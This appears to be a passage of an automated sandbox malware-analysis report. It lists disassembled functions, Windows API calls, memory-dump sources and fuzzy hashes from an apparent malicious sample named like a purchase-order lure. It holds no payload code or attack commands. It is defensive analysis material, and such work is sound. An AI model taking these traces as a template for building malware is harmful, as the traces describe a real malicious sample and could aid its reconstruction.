Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 02C17B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02C18311,?,00000000,?,00000000,00000000), ref: 02C17BDE
__fassign.LIBCMT ref: 02C17C59
__fassign.LIBCMT ref: 02C17C74
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02C17C9A
WriteFile.KERNEL32(?,?,00000000,02C18311,00000000,?,?,?,?,?,?,?,?,?,02C18311,?), ref: 02C17CB9
WriteFile.KERNEL32(?,?,00000001,02C18311,00000000,?,?,?,?,?,?,?,?,?,02C18311,?), ref: 02C17CF2

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: bc7d060f517137c291048de42b27ea19b138fb679aa4ce25dd11de0af70673ec
Instruction ID: a5cf194d87602baf6cd93e6b5a2e06e33740deb8c33014c2952bc10a8d4b0498
Opcode Fuzzy Hash: bc7d060f517137c291048de42b27ea19b138fb679aa4ce25dd11de0af70673ec
Instruction Fuzzy Hash: 855193B1E002499FDB10CFA8D886BEEFBF5EF4A300F14455AE555E7281D7309955CBA0

Function 02C13216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C131DA: _free.LIBCMT ref: 02C13203

_free.LIBCMT ref: 02C13264

Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE

_free.LIBCMT ref: 02C1326F
_free.LIBCMT ref: 02C1327A
_free.LIBCMT ref: 02C132CE
_free.LIBCMT ref: 02C132D9
_free.LIBCMT ref: 02C132E4
_free.LIBCMT ref: 02C132EF

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction ID: 670746cda83927647c8f5948c3a957a1196718aececa172a2e9b067c62c7b24e
Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
Instruction Fuzzy Hash: 14113D72A40B54AAEE31FBB0CC0BFCB779E6F07704F400955AA9EA7050DA65A504FA91

Function 02C144E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02C1473A,?,?,00000000), ref: 02C14543
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02C1473A,?,?,00000000,?,?,?), ref: 02C145C9
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02C146C3
__freea.LIBCMT ref: 02C146D0

Part of subcall function 02C132FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02C1332C

__freea.LIBCMT ref: 02C146D9
__freea.LIBCMT ref: 02C146FE

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4abababdd28cee719b0f49926bd774169b4a5b092f9a805eaf57d6dabd2a75b8
Instruction ID: d752e1e69330a32d0085726cf16db1711f6438995a41c782e3216d2053e24780
Opcode Fuzzy Hash: 4abababdd28cee719b0f49926bd774169b4a5b092f9a805eaf57d6dabd2a75b8
Instruction Fuzzy Hash: F351D272600216AFDB398F64CC43EAF77AAEB86758B154628FC08D7140EB74DD50EA50

Function 02C1185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02C0FDB7), ref: 02C1185F
_free.LIBCMT ref: 02C11892
_free.LIBCMT ref: 02C118BA
SetLastError.KERNEL32(00000000), ref: 02C118C7
SetLastError.KERNEL32(00000000), ref: 02C118D3
_abort.LIBCMT ref: 02C118D9

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 640c76066766b0eabeadf936d024bede1c4690a011618f96b89b3b3fb39c84fe
Instruction ID: 4ae6a1ac5c44c9ab74f04969453253e37a4c2c1c1b2a02b5af1a6069fed37dd3
Opcode Fuzzy Hash: 640c76066766b0eabeadf936d024bede1c4690a011618f96b89b3b3fb39c84fe
Instruction Fuzzy Hash: 78F0F9365406106BE62226356C07F2E12675FC3771B2A8734FE1D92240EFA98912F551

Function 02C13FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02C13F73,00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002), ref: 02C13FE2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02C13FF5
FreeLibrary.KERNEL32(00000000,?,?,?,02C13F73,00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000), ref: 02C14018

Strings

CorExitProcess, xrefs: 02C13FED
mscoree.dll, xrefs: 02C13FDB

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1b134a726228be671428c01bdfde7e8b97e018de82e43cd516e95255dfefc78f
Instruction ID: d65e50c69ec450ef88de1c49173dea18d1da814372f9dc8557f4183c7ae1b4cf
Opcode Fuzzy Hash: 1b134a726228be671428c01bdfde7e8b97e018de82e43cd516e95255dfefc78f
Instruction Fuzzy Hash: 8DF0A431E41218FBDB259F91DC0BB9DBBB9FF45766F100164E806A2140CF708A54DA90

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 02C118DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000008,?,?,02C115D8,02C13CBB,?,02C11D2A,?,?,00000000), ref: 02C118E4
_free.LIBCMT ref: 02C11919
_free.LIBCMT ref: 02C11940
SetLastError.KERNEL32(00000000,?,02C11D2A,?,?,00000000), ref: 02C1194D
SetLastError.KERNEL32(00000000,?,02C11D2A,?,?,00000000), ref: 02C11956

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: ca3e16a45a4dfcf1c517af63d36b97c7b9115a69a0521b46cc50a0192aecd61a
Instruction ID: d475260ed234c49a5b35f9e01ac6e862d745f6dfd49b54eb668bcf089c6d927c
Opcode Fuzzy Hash: ca3e16a45a4dfcf1c517af63d36b97c7b9115a69a0521b46cc50a0192aecd61a
Instruction Fuzzy Hash: 1201493A140611AFD31225316C87F3B136EABC7274B290625FF2DE2245FFA98511F451

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(03421660), ref: 00414050

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 02C13171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 02C13189

Part of subcall function 02C12096: HeapFree.KERNEL32(00000000,00000000,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?), ref: 02C120AC
Part of subcall function 02C12096: GetLastError.KERNEL32(?,?,02C13208,?,00000000,?,00000000,?,02C1322F,?,00000007,?,?,02C12697,?,?), ref: 02C120BE

_free.LIBCMT ref: 02C1319B
_free.LIBCMT ref: 02C131AD
_free.LIBCMT ref: 02C131BF
_free.LIBCMT ref: 02C131D1

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d001312c22ab98564c8a7eec32aca261492481262b99aae97fea64c4b9e84bc6
Instruction ID: 48e19b73294570abe38aa11ed70c132e9605f019dc5b71d32bee065c72948cb3
Opcode Fuzzy Hash: d001312c22ab98564c8a7eec32aca261492481262b99aae97fea64c4b9e84bc6
Instruction Fuzzy Hash: 93F06233944250AFCB31DA64FC86D1673DEBA823297640D49F80DD7604CB30F990FAA4

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 02C134FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02C1354C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02C135D5
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02C135E7
__freea.LIBCMT ref: 02C135F0

Part of subcall function 02C132FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02C1332C

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 0dd8afe1a29e4b49ddcbf9625dc179e34f33ba8d7ddf4967cc597731b930aa59
Instruction ID: f3608ed14c32a8074c2e7f41ce4649e1bef28fc393c3fee8de2421e91ebc25ac
Opcode Fuzzy Hash: 0dd8afe1a29e4b49ddcbf9625dc179e34f33ba8d7ddf4967cc597731b930aa59
Instruction Fuzzy Hash: FD31167290024A9BDF25DF64CC42DAF7BA6EF42718F1401A8EC04D7290E735CA54EB90

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 02C1218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02C115D8,00000000,00000000,?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue), ref: 02C121BD
GetLastError.KERNEL32(?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue,02C26FC4,FlsSetValue,00000000,00000364,?,02C1192D), ref: 02C121C9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02C12132,02C115D8,00000000,00000000,00000000,?,02C12283,00000006,FlsSetValue,02C26FC4,FlsSetValue,00000000), ref: 02C121D7

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: db0250b924291f3a86b90eae426e1b382944f0f3922e6a68cf7d55009cbcd455
Instruction ID: 8f727ee585650a6f34bd70ef90bd8a6578ea030f0f1f9ec3a603563071e900b7
Opcode Fuzzy Hash: db0250b924291f3a86b90eae426e1b382944f0f3922e6a68cf7d55009cbcd455
Instruction Fuzzy Hash: DC018876A822329BC7318A79DC46B567B98AB47B617310B20EE15D7140D720D911D6F1

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Function 02C0FAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

pow, xrefs: 02C0FBF5, 02C0FC12

Memory Dump Source

Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: ea5511959172023246e4a43610310effd32ea8e343302847d4f451617e9e9a44
Instruction ID: f7c5f48b4f93f520d07158e4cc2b2c8704e904a8f6fb608f42ae0fee06c5cbcb
Opcode Fuzzy Hash: ea5511959172023246e4a43610310effd32ea8e343302847d4f451617e9e9a44
Instruction Fuzzy Hash: 08519F71E1860186CB35BB14C98337A77A0EBC1740F288D1CE9D9426D8EF7985E5EE83

Analysis Process: zeXKjViL.exePID: 7272, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	93
Total number of Limit Nodes:	9

Executed Functions

Function 05584B85 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05584CA2

Memory Dump Source

Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5080e461cbe7137318f1ecf272b4f48bf741cad0b871aa1b732aff33c44ab629
Instruction ID: fd41a419462c2cf5f5f178ccc739c82b6f9767ba95909da1706b0e2e6a51f796
Opcode Fuzzy Hash: 5080e461cbe7137318f1ecf272b4f48bf741cad0b871aa1b732aff33c44ab629
Instruction Fuzzy Hash: 3851B0B1D10309DFDF14DF99C984ADEBBB5BF48314F24812AE819AB210D7759885CF90

Function 05584B90 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05584CA2

Memory Dump Source

Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 32abf38ce21314e5ff3708ee07ec651271f955f8e77437083cf368a70e9827e3
